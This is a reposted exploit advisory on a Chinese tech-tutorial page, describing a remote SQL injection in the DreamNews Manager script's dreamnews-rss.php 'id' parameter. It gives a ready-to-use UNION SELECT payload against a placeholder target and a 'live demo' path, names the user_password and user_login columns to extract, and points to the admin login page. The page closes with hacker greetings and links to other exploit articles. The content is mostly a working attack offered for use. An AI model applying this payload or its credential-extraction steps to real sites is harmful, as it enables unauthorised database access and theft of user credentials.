手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >DreamNews Manager (id) Remote SQL Injection Vulnerability
DreamNews Manager (id) Remote SQL Injection Vulnerability
摘要:###########################################################dreamnews(r...

#########################################################

#

# dreamnews ( rss) Remote SQL Injection Vulnerability

#========================================================

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc =

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

#=========================================================

#

# script : /dreamnews.php

#

# DorK : N/A

#

##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

L!VE DEMO:

/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

column_name :

user_password

user_login

Admin Login :

/admin/

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【DreamNews Manager (id) Remote SQL Injection Vulnerability】相关文章:

恶意js脚本注入访问伪随机域名的实例解析

Win8怎么解决无法启动安全中心服务的问题?

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

PHP的一个EVAL的利用防范

IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

不怕忘密码 巧破NTFS下Win2000口令

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

360安全卫士总是阻止hosts更改该怎么办?

webshell低权限重启服务器的另类方法

精品推荐
分类导航